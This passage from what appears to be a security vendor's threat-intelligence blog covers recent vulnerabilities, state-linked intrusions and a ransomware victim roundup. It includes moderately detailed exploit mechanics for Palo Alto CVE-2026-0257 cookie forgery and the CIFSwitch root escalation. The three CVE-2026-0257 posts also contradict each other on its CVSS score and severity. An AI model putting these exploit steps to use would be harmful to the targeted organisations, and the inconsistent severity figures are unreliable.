poorly secured industrial systems. In March 2026, the LA County Metropolitan Transportation Authority (LACMTA), or LA Metro, experienced internal operational disruptions following a breach linked to Iranian state-sponsored hackers. The pro-Iran hacktivist group Ababil of Minab claimed responsibility, asserting they wiped hundreds of terabytes of data and exfiltrated over 1TB of files, though bus and rail services remained unaffected. Further, on April 7, CISA, the FBI, and the National Security Agency jointly warned that Iranian-affiliated APT actors, including the CyberAv3ngers (aka Shahid Kaveh Group), were exploiting programmable logic controllers across U.S. critical infrastructure in sectors such as Government Services, Water and Wastewater Systems, and Energy. The Stryker Corporation, a major medical technology giant, was hit by a destructive "wiper" attack in March 2026, attributed to an Iran-aligned hacktivist group. This attack, aimed at destroying systems rather than extortion, forced entire offices to shut down operations and exposed vulnerabilities in the healthcare supply chain. Simultaneously, China-aligned actors orchestrated campaigns like "Salt Typhoon" and UAT-7290. Salt Typhoon maintained deep, persistent access inside U.S. telecommunications carriers and government communications through early 2026, mapping critical digital routing infrastructure. UAT-7290 exploited unpatched vulnerabilities in edge network devices of U.S. and allied telecom providers, establishing permanent malware footholds capable of intercepting or shutting down data flows. Adding another layer of complexity, AI-driven ransomware campaigns, utilizing tools like the "Tsundere Bot" and automated scanning, have emerged in Q1/Q2 2026. These campaigns autonomously handle network reconnaissance, scan U.S. municipal utilities for vulnerabilities, and execute credential theft without human intervention, leading to a 62 percent higher cyber attack frequency in the U.S. compared to the global average. A ransomware attack on Brightspeed, a major U.S. broadband and telecommunications provider, in early 2026, disrupted back-end operations and highlighted the vulnerability of localized internet infrastructure to supply-chain extortion. Does a Critical RCE Flaw in Comet Backup Server Expose Customer Data? A critical Remote Code Execution (RCE) vulnerability, CVE-2026-32999, has been identified in Comet Backup server software, posing a severe risk to enterprise backup environments. This flaw carries an alarming CVSS score of 9.1, indicating its high potential for impact and ease of exploitation. The vulnerability affects all Comet Backup product versions prior to 26.4.3 and 26.5.0, making immediate patching essential for self-hosted administrators. The core issue resides in specific administrative branding permissions within the Comet Backup system. A tenant administrator, under certain conditions, can upload custom .dll or .so executables for code signing. Subsequently, the attacker can generate a malicious backup-tool client, which when executed, compromises the platform. This malicious action effectively bypasses established tenancy boundaries, allowing unauthorized code execution within the cometd process. Successful exploitation of CVE-2026-32999 grants threat actors extensive control and access. This includes full access to critical user data stored in the config.cfg file, the ability to harvest backed-up data from remote devices containing the backup-tool client, and the capability to stop, replace, or completely remove the Comet Server installation. Furthermore, the exploit permits code execution on behalf of a privileged user on any connected endpoint, presenting a profound risk to data privacy and system integrity. While Comet Hosted servers have already been automatically upgraded by the vendor, self-hosted deployment teams must manually update their instances to version 26.4.3, 26.5.0, or higher from the official download portal to mitigate the risk of active compromise. What is the Impact of the CIFSwitch Linux Privilege Escalation Flaw? A newly discovered local privilege escalation (LPE) vulnerability, dubbed CIFSwitch, impacts the Linux kernel CIFS subsystem and cifs-utils, allowing unprivileged users to gain root privileges on affected systems. This flaw, introduced nearly two decades ago in 2007, exploits a failure in the Linux kernel's CIFS subsystem to verify the origin of cifs.spnego key requests. The CIFS (Common Internet File System) protocol enables Linux systems to access remote files, folders, and devices over a network, often using Kerberos for authentication. An unprivileged user can forge a cifs.spnego request, which is normally used by the Linux keyring subsystem to obtain authentication data for the CIFS/SMB client. This forged request triggers the normal authentication workflow, deceiving the root-privileged cifs.upcall helper into trusting attacker-controlled fields. By manipulating these fields to force a namespace switch and then triggering a Name Service Switch (NSS) lookup before privileges are dropped, a local attacker can load a malicious NSS module and achieve root code execution. The CIFSwitch vulnerability is not universal and its exploitation depends on several factors, including a vulnerable kernel version (versions 6.14 and higher, with some older variants also affected), a vulnerable cifs-utils version, the availability of user namespaces, and permissive SELinux/AppArmor policies. Distributions confirmed as vulnerable with their default configurations include Linux Mint 21.3/22.3, CentOS Stream 9, Rocky Linux 9, AlmaLinux 9, Kali Linux 2021.4-2026.1, and SLES 15 SP7. Other distributions like Ubuntu, Debian, Pop!_OS, openSUSE, Oracle Linux, and Amazon Linux may also be vulnerable if cifs-utils is installed. A kernel patch (commit 3da1fdf4efbc490041eb4f836bf596201203f8f2) has been implemented upstream to add validation of cifs.spnego request origins. Organizations are advised to disable or blacklist the CIFS module if unused, remove the cifs-utils package if unnecessary, or disable unprivileged user namespaces to mitigate the risk. A proof-of-concept (PoC) exploit for CIFSwitch has been published to aid in validating applied patches and mitigations. Technical Takeaways The DPRK-linked actor FAMOUS CHOLLIMA is using MicrosoftSystem64, a multi-platform RAT, to actively compromise cryptocurrency traders, exfiltrating over 1TB of data including 1,097 credential files and 417 screenshots, leveraging HuggingFace for C2 and data exfiltration. Palo Alto Networks' PAN-OS GlobalProtect VPN is experiencing active exploitation of CVE-2026-0257, a High-severity authentication bypass flaw, with attacks observed from Vultr and Dromatics Systems infrastructure since May 17, 2026. State-sponsored groups, including Iranian-affiliated cyber actors (Ababil of Minab, CyberAv3ngers) and China-aligned actors (Salt Typhoon, UAT-7290), are escalating attacks on critical infrastructure, demonstrating intent for physical disruption and data wiping, as seen with LA Metro and Stryker Corporation. A critical Remote Code Execution (RCE) vulnerability, CVE-2026-32999 (CVSS 9.1), in Comet Backup server allows tenant administrators to achieve full server compromise and data exfiltration if not patched to versions 26.4.3 or 26.5.0 or higher. The CIFSwitch local privilege escalation flaw in the Linux kernel CIFS and cifs-utils allows unprivileged users to gain root access on multiple Linux distributions, stemming from a 19-year-old vulnerability now addressed by kernel patch 3da1fdf. --- ## Palo Alto GlobalProtect CVE-2026-0257 (CVSS 7.8) Auth Bypass - URL: https://purple-ops.io/blog/palo-alto-globalprotect-cve-2026-0257 - Date: 2026-05-31 - Category: CVE Analysis - Tags: palo-alto, globalprotect, cve-2026-0257, authentication-bypass, active-exploitation - Reading time: 5 min | CVSS: 7.8 **Summary:** Palo Alto Networks GlobalProtect CVE-2026-0257 is an authentication bypass vulnerability actively exploited by threat actors for unauthorized VPN access. Palo Alto GlobalProtect CVE-2026-0257 (CVSS 7.8) Auth Bypass Palo Alto Networks has warned about CVE-2026-0257, an authentication bypass vulnerability in its PAN-OS and Prisma Access software. This issue affects specific GlobalProtect configurations. The vulnerability has a CVSS score of 7.8 (High severity by NVD, medium by Palo Alto Networks), allowing unauthorized actors to establish VPN connections and bypass security restrictions. The flaw impacts GlobalProtect portal and gateway deployments under specific certificate and authentication override cookie settings. Security research firms confirm CVE-2026-0257 is actively exploited. Attacks target unpatched devices without implemented mitigations. Initial exploitation attempts occurred on May 17, 2026, followed by a second wave on May 21, 2026. The same threat actor carried out these exploitation efforts. Successful exploitation of this authentication bypass gives attackers unauthorized access to internal networks via VPN, posing a significant risk to affected organizations. While no follow-on activities within compromised customer environments have been reported immediately after VPN establishment, further compromise is possible. Organizations should review configurations, apply vendor patches, or implement recommended temporary mitigations immediately. What is CVE-2026-0257 and its technical nature? CVE-2026-0257 is an authentication bypass vulnerability within the GlobalProtect portal and gateway components of Palo Alto Networks PAN-OS software and Prisma Access. This flaw, with a CVSS score of 7.8, bypasses security protocols designed to authenticate users before granting network access. The vulnerability occurs under specific preconditions: when the GlobalProtect portal or gateway is configured, when authentication override cookies are enabled, and when a particular certificate configuration is active. An attacker who exploits CVE-2026-0257 can bypass the normal authentication process for GlobalProtect VPN connections. This allows them to establish an unauthorized VPN session, gaining a foothold within an organization's internal network perimeter. The flaw's technical nature involves how authentication override cookies and certificate configurations are handled, creating a logical vulnerability that allows an unauthenticated adversary to gain privileged access to the VPN service. While the base CVSS score is "High" severity, active exploitation on an edge-facing VPN appliance increases its practical criticality. Impact The impact of CVE-2026-0257 is substantial because it is an authentication bypass on an edge-facing enterprise VPN appliance. An attacker exploiting this vulnerability can establish an unauthorized VPN connection to the victim organization's internal network. This direct access bypasses the primary security control for remote access, giving the attacker a pathway into the corporate infrastructure. Immediate risks include unauthorized data access, network reconnaissance, and potential for lateral movement within the compromised environment. Organizations using Palo Alto Networks PAN-OS or Prisma Access with the GlobalProtect portal or gateway configured under the specific vulnerable conditions are at risk. The CVSS score of 7.8 indicates high severity, showing the potential for full network access compromise. Initial observations of exploitation did not immediately report follow-on activity within internal networks, but establishing an unauthorized VPN session is a critical step towards further actions. This could involve deploying malware, exfiltrating sensitive data, or disrupting critical services, depending on attacker goals and network segmentation. Exploitation Chain Exploitation of CVE-2026-0257 begins with an adversary targeting Palo Alto Networks PAN-OS or Prisma Access deployments that use the GlobalProtect portal or gateway. Successful exploitation requires specific preconditions in the targeted environment: The GlobalProtect portal or gateway must be configured and running. Authentication override cookies must be enabled. A specific, unstated certificate configuration must be active. When these conditions are met, the vulnerability allows an attacker to bypass standard authentication mechanisms. This means they can avoid providing legitimate credentials or satisfying multi-factor authentication, if configured. A successful bypass immediately results in an unauthorized VPN connection. Rapid7's observations of in-the-wild exploitation showed "VPN IP assignment following the cookie authentication," which directly led to the attacker accessing the internal network. While public Proof-of-Concept (PoC) code was not explicitly mentioned, confirmed active exploitation suggests threat actors have developed and deployed effective methods to use this flaw. Observed attacks, occurring on May 17, 2026, and in a second wave on May 21, 2026, demonstrate a clear threat. Further analysis of this vulnerability and its exploitation can be found in our prior investigations, such as our detailed post on CVE-2026-0257 in Palo Alto GlobalProtect and another concerning the exploit in Palo Alto CVE-2026-0257. These resources provide additional context and technical insights into the exploit. How is CVE-2026-0257 being exploited? CVE-2026-0257 is confirmed under active exploitation by threat actors. Palo Alto Networks initially reported "limited exploit attempts" against unpatched PAN-OS devices without necessary mitigations. Cybersecurity firm Rapid7 corroborated this, identifying successful exploitation in multiple customer environments. The earliest confirmed exploitation attempts occurred on May 17, 2026. A second, distinct wave of exploitation was observed on May 21, 2026. The same threat actor carried out both sets of activities, showing a persistent and targeted campaign. During these attacks, Rapid7 noted attackers successfully bypassed cookie authentication, leading to the assignment of VPN IP addresses. This allowed the attacker to establish an unauthorized VPN session and access the victim's internal network. While initial observed impact did not include immediate follow-on activity within compromised networks, establishing a direct internal network foothold signifies a critical security breach. This active exploitation shows the urgency for organizations to address CVE-2026-0257 promptly, as unpatched systems remain vulnerable. Which products and configurations are affected by CVE-2026-0257? CVE-2026-0257 affects Palo Alto Networks products that use the GlobalProtect VPN functionality under specific configurations. It is not a broad vulnerability affecting all installations of PAN-OS or Prisma Access. Critical dependencies for exploitability are the specific configurations of the GlobalProtect portal or gateway. Affected product lines and the conditions making them vulnerable are: Palo Alto Networks PAN-OS® software: Affected when using the GlobalProtect portal. Affected when using the GlobalProtect gateway. The vulnerability appears only when authentication override cookies are enabled on these GlobalProtect components. A specific, undescribed certificate configuration must be present with the enabled authentication override cookies. Palo Alto Networks Prisma Access: Affected under the same specific conditions as PAN-OS related to GlobalProtect portal or gateway configuration, enabled authentication override cookies, and the specific certificate configuration. Administrators must review their GlobalProtect configurations to determine if their deployments meet these specific criteria, as all three conditions are required for the vulnerability to be exploitable. Research findings do not specify particular PAN-OS version numbers, suggesting the issue lies in the configuration logic itself when these specific settings are applied across multiple versions. Detection Detecting CVE-2026-0257 exploitation primarily involves monitoring for anomalous VPN connections and reviewing authentication logs for bypass activity. Since the exploit allows unauthorized VPN IP assignment and internal network access, security teams should focus on these areas. Detection guidance: VPN Connection Logs Review: Monitor GlobalProtect gateway and portal logs for successful VPN connections from unusual or unauthorized source IP addresses. Look for VPN sessions established without the expected authentication sequence, such as a lack of multi-factor authentication (MFA) prompts where MFA is typically enforced. Identify VPN sessions where the authentication method appears to rely solely on "cookie authentication" without prior credential validation, especially if this differs from standard procedures. Examine logs from May 17, 2026, and May 21, 2026, and subsequent dates, as these are periods when active exploitation was observed. Authentication Override Cookie Monitoring: Audit configurations related to authentication override cookies on GlobalProtect portal and gateway for unauthorized changes or unusual activity. Monitor for events showing the creation, modification, or suspicious use of these cookies. Certificate Configuration Auditing: Regularly audit certificates for GlobalProtect, especially those for authentication override features. Anomalies could indicate preparation for or actual exploitation. Network Activity Monitoring: After a VPN connection, monitor internal network traffic from newly assigned VPN IP addresses for unusual patterns, such as: Access to sensitive systems or data that the VPN user should not normally access. Attempts at lateral movement or internal network reconnaissance. Unexpected bandwidth usage or connection patterns. EDR/Endpoint Telemetry: While the initial exploit is network-based, any follow-on activity by an attacker after establishing a VPN connection would likely generate endpoint telemetry. Monitor endpoints for: New process executions from VPN user sessions outside the baseline. Unusual file access or creation. Suspicious network connections initiated by users authenticated via VPN. Robust logging and centralized security information and event management (SIEM) solutions are critical for collecting and analyzing data to detect CVE-2026-0257 exploitation. Remediation Addressing CVE-2026-0257 requires immediate action. Prioritize patching, and if immediate patching is not possible, implement temporary mitigations. The main remediation strategy is to apply vendor-supplied patches that resolve the authentication bypass vulnerability. Specific remediation steps: Patch Application: Upgrade Palo Alto Networks PAN-OS software to patched versions provided by the vendor. Consult the official Palo Alto Networks security advisory for CVE-2026-0257 for exact patch versions for your PAN-OS release train. For Prisma Access deployments, ensure the cloud service is updated to the patched configuration, as Palo Alto Networks typically manages these. Verify status through your Prisma Access dashboard or support channels. Temporary Mitigations (if immediate patching is not possible): Disable Authentication Override Feature: The most direct temporary mitigation is to disable the authentication override feature entirely on your GlobalProtect portal and gateway configurations. This removes one critical precondition for the vulnerability's exploitation. Disabling this feature may affect legitimate user workflows that rely on it, so understand its operational use before implementation. Generate a New Exclusive Certificate: If the authentication override feature cannot be disabled, generate a new digital certificate. Configure this new certificate for exclusive use with the authentication override feature. This aims to isolate the vulnerable configuration and potentially disrupt the attacker's ability to use the "specific certificate configuration" mentioned. Configuration Review and Hardening: Conduct a full review of all GlobalProtect portal and gateway configurations to ensure authentication override cookies are not enabled unnecessarily. Evaluate the necessity of any specific certificate configurations that interact with authentication processes and consider hardening or reconfiguring them. Monitoring: Implement continuous monitoring of VPN access logs and network activity as detailed in the detection section. This ongoing surveillance is crucial even after applying patches or mitigations, to verify effectiveness and identify any residual or new suspicious activities. Organizations should treat CVE-2026-0257 with high urgency due to active exploitation and the critical nature of VPN authentication bypass. Technical Takeaways CVE-2026-0257 is an authentication bypass in Palo Alto Networks PAN-OS and Prisma Access GlobalProtect components, with a CVSS score of 7.8. The vulnerability is actively exploited, with observed attacks from May 17, 2026, by a consistent threat actor. Exploitation allows attackers to establish unauthorized VPN connections and access internal networks without valid credentials. The flaw impacts GlobalProtect portal/gateway when authentication override cookies are enabled and a particular certificate configuration exists. Primary remediation is applying vendor-supplied patches; temporary mitigations include disabling authentication override or using an exclusive certificate for this feature. --- ## Nova RALord Ransomware Activity Targets 3 Victims - URL: https://purple-ops.io/blog/nova-ralord-ransomware-activity - Date: 2026-05-30 - Category: Ransomware Report - Tags: nova-ralord, ransomware, threat-intelligence, cybersecurity - Reading time: 5 min **Summary:** Nova (RALord) ransomware led recent activity, impacting 3 new victims across diverse sectors and geographies in the last 24 hours. Nova RALord Ransomware Activity Targets 3 Victims Statistical Overview Victim Totals This month: 760 This quarter: 1538 Year to date: 4163 Last 24h: 16 Quarterly Breakdown Q1: 2631 | Q2: 1538 | Q3: 0 | Q4: 0 Ransomware activity continues to show high volume this quarter, though the last 24-hour period indicates a lower-volume but diverse set of attacks. Nova (RALord) was the most active group in this timeframe, followed by DragonForce and Lapsus. Introduction The past 24 hours saw 16 new ransomware victims reported across varied sectors and geographies. Nova (RALord) emerged as the most active group, followed by DragonForce and Lapsus. Attackers showed broad targeting, impacting industries from automotive and education to manufacturing and technology. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1Nova (RALord)3Bc3 tecnologia, Daegu university ai department, Lti services and larick towingSouth Korea, United StatesAutomotive, Education 2DragonForce2Henry molded products likely to engage tag., Shoreline sightseeingUnited StatesManufacturing, Hospitality & Travel 3Lapsus2Github internal, Ingka group (ikea)Netherlands, United StatesRetail & Ecommerce, Technology / Software 4Bravox1Academyhealth ??United StatesGovernment / Public Sector 5CMD1Lee Law OfficesUnited StatesLegal 6Gunra1StarempireSouth KoreaMedia & Entertainment 7INC Ransom1www.labexpress.comUnited StatesHealthcare 8Kairos1Commune de camiersFranceGovernment / Public Sector 9Krybit1Ecci-srl.comItalyEducation 10PEAR1Plexsupply incUnited StatesRetail & Ecommerce 11Termite1Https://www.imminet.com/United StatesManufacturing 12Titan1Apex maritime co., inc.United StatesTransportation & Logistics Nova (RALord) led the activity with three victims, targeting entities like Daegu University in South Korea and an automotive service provider in the United States. DragonForce, a ransomware group, added two new victims including a manufacturing company and a hospitality business. Lapsus, which has carried out high-profile breaches, claimed two new victims, targeting Github internal and Ingka group (ikea), impacting technology and retail sectors. The CMD ransomware group also reported activity, targeting legal services. Further insights into DragonForce's operations can be found in our deep dive on DragonForce ransomware's real estate and healthcare targeting, and information on the CMD ransomware group is available in our CMD ransomware healthcare and nonprofit blog post. The victim pool showed high diversity across sectors and geographies. The United States experienced the highest concentration of attacks. Victim Distribution By Country United States: 10 South Korea: 2 Brazil: 1 France: 1 Italy: 1 Netherlands: 1 By Industry Software Development: 2 Government: 1 Education: 1 Retail: 1 Entertainment: 1 Higher Education: 1 Heavy-Duty Truck Customization and Repair: 1 Hospitality: 1 Legal Services: 1 Medical Laboratory Services: 1 The United States remains the primary target geography for ransomware operations, accounting for over half of all reported victims in this period. Industry targeting remains fragmented, with no single sector experiencing a concentrated surge. This suggests opportunistic or broadly distributed campaigns rather than specialized attacks. Ransomware News Topline - An in-depth review of a city's recovery from an Interlock ransomware attack shows the critical role of pre-existing incident response plans and effective recovery strategies. Campaigns & Operations - St. Paul, Minnesota, successfully recovered from an Interlock ransomware attack that occurred in July 2025 without paying the ransom. The city's response involved a cross-agency effort, including emergency management, state IT, federal investigators, private cybersecurity partners, and the Minnesota National Guard, all guided by a solid incident response plan and nightly backups. Vulnerabilities & TTPs - The recovery prioritized essential services like 911 and payroll, with full restoration by the third week of August. A full "Operation Secure St. Paul" initiative involved a large-scale password reset for over 3,000 employees, enforcement of multi-factor authentication (MFA), device checks, and enhanced endpoint detection. National Guard FirstNet connectivity provided support for these efforts. Analyst Note - This incident shows proactive preparedness, including strong incident response frameworks and complete backup regimes, helps mitigate ransomware impact and avoid ransom payments. Technical Takeaways Nova (RALord) was the most active ransomware group in the past 24 hours, observed with three new victims. Ransomware activity remains globally distributed, with new victims reported across North America, Asia, and Europe. The United States represents the main target geography, accounting for 10 of the 16 reported victims. Industry targeting is diverse, with no single sector experiencing significant concentration of attacks. Organizations including Github internal and Ingka group (ikea) were impacted by the Lapsus ransomware group. --- ## Palo Alto GlobalProtect CVE-2026-0257 Actively Exploited - URL: https://purple-ops.io/blog/cve-2026-0257-palo-alto-globalprotect - Date: 2026-05-30 - Category: CVE Analysis - Tags: palo-alto, globalprotect, cve-2026-0257, authentication-bypass, actively-exploited - Reading time: 5 min | CVSS: 9.8 **Summary:** Palo Alto Networks PAN-OS GlobalProtect CVE-2026-0257 is a critical authentication bypass actively exploited. Palo Alto GlobalProtect CVE-2026-0257 Actively Exploited Palo Alto Networks' PAN-OS, specifically its GlobalProtect VPN gateways, has a critical authentication bypass vulnerability, CVE-2026-0257. This flaw allows unauthenticated remote attackers to gain unauthorized access to enterprise networks, circumventing security perimeters. Active exploitation of CVE-2026-0257 has been confirmed, leading to its inclusion in the CISA Known Exploited Vulnerabilities catalog on May 29, 2026. The vulnerability stems from an insecure authentication token validation process within the GlobalProtect feature. A critical signature verification step is omitted after token decryption. Threat actors are using this defect to forge valid session cookies, bypassing normal authentication and gaining unauthorized access. Attacks have been observed in multiple waves, with initial signs dating back to May 17, 2026, and continuing with a secondary wave on May 21st. Organizations using affected Palo Alto Networks PAN-OS configurations should prioritize immediate patching or apply vendor-supplied mitigation steps. Failure to address CVE-2026-0257 can result in severe compromise, including full internal network access, as observed in active campaigns. What is CVE-2026-0257 and why is it critical? CVE-2026-0257 is an authentication bypass vulnerability affecting Palo Alto Networks PAN-OS appliances when configured with specific GlobalProtect VPN settings. It is critical because it permits unauthenticated remote attackers to bypass the authentication process, leading directly to unauthorized access to an organization's internal network resources. Its active exploitation makes it an immediate threat to any vulnerable environment. The flaw allows an adversary to assume an authenticated state without providing legitimate credentials, nullifying a primary security control. This direct circumvention of authentication mechanisms is a severe security defect; it undercuts the principle of verifying user identity before granting network access. Such vulnerabilities often enable attackers to establish a foothold for lateral movement, data exfiltration, deploying additional malicious payloads, or maintaining persistent access within the compromised network. The observed exploitation, including successful acquisition of VPN IP assignments and subsequent internal network access, shows the risk CVE-2026-0257 poses to corporate environments globally. Impact An attacker successfully exploiting CVE-2026-0257 can achieve a total authentication bypass on vulnerable Palo Alto Networks PAN-OS GlobalProtect VPN Gateways. This allows unauthorized access to enterprise perimeter networks, nullifying the security posture provided by the VPN. The direct consequence is that threat actors can establish an authenticated session, granting them a foothold within the corporate network. The real-world reach of this vulnerability is broad. Observed exploitation campaigns have demonstrated that attackers can obtain full internal network access after successfully receiving a VPN IP assignment through this bypass. This level of access can lead to severe compromises, including unauthorized access to sensitive data, deployment of malware, lateral movement within the network, and establishment of persistent access. Organizations that rely on GlobalProtect for secure remote access and have configurations vulnerable to CVE-2026-0257 are at immediate risk of network intrusion and internal system compromise. This type of authentication bypass, where cryptographic weaknesses allow for forged credentials, is similar to other critical vulnerabilities, such as the FortiOS authentication bypass that has also seen active exploitation. Exploitation chain Exploitation of CVE-2026-0257 by threat actors relies on a specific configuration and a critical validation flaw within the Palo Alto Networks PAN-OS GlobalProtect authentication override mechanism. The attack vector is remote and unauthenticated, targeting the server-side processing of authentication tokens. The vulnerability's technical foundation lies within a specialized access feature designed to simplify the user login experience for GlobalProtect portals and gateways. This feature enables the issuance of authentication cookies to previously authenticated users, allowing them to use these tokens for future web communications without re-supplying raw credentials. A critical validation defect exists within the core binary decryption handler responsible for processing these tokens. When an incoming authentication token is base64-decoded and subsequently decrypted using a private key, the decrypted content is then implicitly trusted. The critical flaw is the complete absence of any signature verification after this decryption process. The preconditions for successful exploitation are crucial: the vulnerability specifically affects devices configured to reuse the primary portal certificate across multiple network features. This includes scenarios where the primary portal certificate, typically used for public HTTPS services, is also employed for encrypting and decrypting GlobalProtect authentication tokens. In such cases, a remote unauthenticated attacker can capture the public key associated with this shared certificate. With the public key in hand, the adversary can then construct and encrypt their own forged, valid security cookies. When these maliciously crafted cookies are presented to the vulnerable PAN-OS appliance, the device processes them server-side, implicitly trusting the decrypted content due to the missing signature check. As a direct result, the appliance grants the attacker unauthorized access, leading to a total authentication bypass. Active exploitation of CVE-2026-0257 has been observed. Forensic investigators noted the earliest signs of unauthorized access attempts on May 17, 2026. During this initial wave, attackers launched authentication probes from the Vultr hosting infrastructure. A secondary wave of attacks was identified on May 21st, employing a different infrastructure provider, Dromatics Systems. Despite the shift in network location, investigators identified a consistent MAC address across both campaigns, suggesting a singular threat group is leading these operations. In the second observed wave, hackers successfully used the vulnerability to obtain full internal network access after being assigned a VPN IP. For further context on critical exploits in Palo Alto Networks products, refer to our prior analysis of CVE-2024-3400. Affected products and versions The CVE-2026-0257 authentication bypass vulnerability affects Palo Alto Networks PAN-OS when configured in specific scenarios related to its GlobalProtect feature. Product: Palo Alto Networks PAN-OS Component: GlobalProtect portal and gateway functionality. Affected Configurations: The vulnerability affects appliances running PAN-OS with GlobalProtect VPN configurations that reuse the primary portal certificate across multiple network features. Devices are vulnerable if the certificate used for public HTTPS services is also employed for issuing and validating GlobalProtect authentication tokens. Version Information: Research findings do not specify particular PAN-OS version numbers affected by CVE-2026-0257. The vulnerability's exploitability is tied to the certificate management configuration rather than a specific software version range. Detection Detecting exploitation of CVE-2026-0257 can be challenging; standard network monitoring tools might not immediately identify the underlying cookie validation anomaly. Several indicators can point to potential or active compromise: Unusual GlobalProtect VPN Connections: Monitor for successful GlobalProtect VPN connections from external IP addresses not typically associated with legitimate organizational users or established VPN client pools. This includes connections from known suspicious IP ranges or unexpected geographic locations. Anomalous Authentication Attempts: Review authentication logs for the GlobalProtect portal and gateway for unusual login patterns. Look for a high volume of authentication probes or successful logins from IP addresses associated with known hosting providers or suspicious autonomous systems, such as Vultr or Dromatics Systems, which have been linked to observed exploitation. VPN IP Assignment Without Credential-Based Authentication: Investigate any instances where a client or user account is assigned a GlobalProtect VPN IP address without a preceding successful credential-based authentication event. This indicates a potential bypass of the standard login process. Irregular Cookie Structures/Token Exchanges: If deep packet inspection or advanced network traffic analysis capabilities are in place, look for anomalies in the structure or exchange of GlobalProtect authentication cookies that might indicate tampering or forgery. This would involve identifying tokens that bypass typical signature validation flows. Certificate Usage Review: Review internal certificate management logs and configurations to identify instances where the primary portal certificate is being used for both public HTTPS services and GlobalProtect authentication token management. This specific configuration is a precondition for CVE-2026-0257 exploitation. While CVE-2026-0257 involves an authentication bypass, similar issues in other vendors have involved authentication bypasses, as discussed in our analysis of a Cisco SD-WAN flaw. Remediation Immediate remediation is critical for organizations operating Palo Alto Networks PAN-OS with affected GlobalProtect configurations, given the active exploitation of CVE-2026-0257. Patching: Upgrade Palo Alto Networks PAN-OS perimeter appliances to vendor-supplied patches urgently. Organizations should consult the official security advisory for CVE-2026-0257 provided by Palo Alto Networks for specific patch versions and deployment instructions. The vendor's advisory is available at security.paloaltonetworks.com/CVE-2026-0257. Workarounds (if immediate patching is not possible): Disable Authentication Override: As an emergency configuration adjustment, administrators can disable the authentication override feature within the GlobalProtect portal dashboard. This action will prevent the issuance and acceptance of authentication cookies, removing the vulnerability vector. Unique Certificate for Cookie Management: Alternatively, engineers can generate and configure a unique, dedicated certificate exclusively for GlobalProtect cookie management. This new certificate must not be reused across other public-facing HTTPS services, breaking the precondition that allows attackers to obtain the public key for forging tokens. Enhanced Monitoring: Implement continuous monitoring for unauthorized access attempts and post-exploitation activities, particularly focusing on GlobalProtect VPN gateways. This includes scrutinizing VPN connection logs, authentication failure/success events, and any unusual internal network activity from VPN-assigned IP addresses. Technical Takeaways CVE-2026-0257 is an actively exploited authentication bypass vulnerability in Palo Alto Networks PAN-OS GlobalProtect. The vulnerability is a cryptographic bypass, stemming from the implicit trust of decrypted authentication tokens without subsequent signature verification. Successful exploitation relies on the misconfiguration of certificate management, specifically the reuse of the primary portal certificate across public-facing services and GlobalProtect cookie management. Observed attacks have resulted in threat actors gaining full internal network access after successfully bypassing authentication. Immediate patching or applying specific configuration workarounds, such as disabling authentication override or using a unique certificate for cookie management, are critical for reducing the threat. --- ## Palo Alto CVE-2026-0257 Exploit Bypasses GlobalProtect - URL: https://purple-ops.io/blog/palo-alto-cve-2026-0257-exploit - Date: 2026-05-30 - Category: Threat Intelligence - Tags: palo-alto, cve-2026-0257, globalprotect, vulnerability, ai-attacks - Reading time: 5 min **Summary:** Palo Alto Networks CVE-2026-0257, a medium-severity authentication bypass, is actively exploited, allowing unauthorized GlobalProtect VPN connections. Palo Alto CVE-2026-0257 Exploit Bypasses GlobalProtect Recent cybersecurity intelligence shows offensive capabilities have increased significantly. Attackers are actively exploiting critical network infrastructure vulnerabilities and using artificial intelligence in their operations. A medium-severity authentication bypass vulnerability, CVE-2026-0257, affecting Palo Alto Networks PAN-OS and Prisma Access GlobalProtect, is being actively exploited. This flaw allows unauthorized VPN connections and access to internal networks, creating an immediate, severe risk for organizations globally. Cybersecurity firm Rapid7 observed successful exploitation of CVE-2026-0257 across many customers. Initial attempts were recorded on May 17, 2026, followed by a second wave on May 21, 2026. The consistent tactics suggest a single, persistent threat actor is behind these campaigns, using the vulnerability to get direct entry into targeted environments. The observed activity involves attackers being assigned VPN IP addresses, confirming their ability to bypass authentication and establish unauthorized network presence. Beyond these critical infrastructure compromises, new, sophisticated Russian-linked actors like GREYVIBE integrate generative AI into multi-vector campaigns against Ukrainian entities. An unknown threat actor also used a large language model (LLM) agent to manage complex post-exploitation activities after a Marimo remote code execution (RCE) via CVE-2026-39987. At the same time, a large npm dependency confusion attack infiltrated corporate developer ecosystems, exploiting supply chain weaknesses to deliver reconnaissance payloads. These incidents show a dynamic threat environment where attackers quickly weaponize both known vulnerabilities and new attack methods. How attackers exploit CVE-2026-0257 in PAN-OS GlobalProtect Attackers are actively using CVE-2026-0257, an authentication bypass vulnerability within the Palo Alto Networks PAN-OS software and Prisma Access GlobalProtect portal and gateway, to establish unauthorized VPN connections. This flaw, with a CVSS score of 7.8, affects firewalls configured with the GlobalProtect portal or gateway when authentication override cookies are enabled and a specific certificate configuration is present. Successful exploitation of this vulnerability gives attackers the ability to bypass security restrictions at the network perimeter. Palo Alto Networks disclosed the vulnerability on May 13, 2026, and later confirmed active exploitation by May 29, 2026. Rapid7 provided more details, identifying successful exploitation attempts dating back to May 17, 2026, with a surge observed on May 21, 2026. The consistency in attack patterns suggests a single threat actor orchestrated both waves of exploitation. During these attacks, Rapid7 confirmed instances where attackers were successfully assigned VPN IP addresses, meaning they had established an unauthorized presence within victim internal networks. No immediate follow-on activity was reported in the directly compromised customer environments. However, establishing a VPN session represents a critical breach of perimeter defenses. An authentication bypass on an edge-facing enterprise VPN appliance can have severe implications, potentially serving as a persistent backdoor for future malicious operations. Organizations should apply vendor-supplied patches quickly. Temporary mitigation strategies include disabling the authentication override feature entirely or generating a new, unique certificate exclusively for the authentication override feature. This flaw directly compromises perimeter defenses, allowing adversaries to bridge external access to internal systems. The new Russia-linked GREYVIBE group and its AI-powered tactics GREYVIBE, a previously undocumented Russian-speaking threat actor, has targeted various Ukrainian and Ukraine-related entities since at least August 2025. The group uses generative artificial intelligence (GenAI) and large language models (LLMs) to improve its operations. Identified by WithSecure, the group's activities align with Kremlin state interests, focusing on intelligence gathering for the Russo-Ukrainian war. Victims include military, government, civilian, and business organizations, showing a broad mandate. GREYVIBE uses multiple attack vectors and custom tools. Its attack chains include: PhantomMail: Spear-phishing emails deliver malicious ZIP or RAR archives, often hosted on Google Drive or 4sync. These archives contain JavaScript-based loaders that launch decoy documents and deploy PhantomRelay, a PowerShell-based remote access trojan (RAT) for host profiling and script execution. PhantomClick: This vector uses ClickFix-style fake CAPTCHA pages on bogus domains that pretend to be legitimate services like 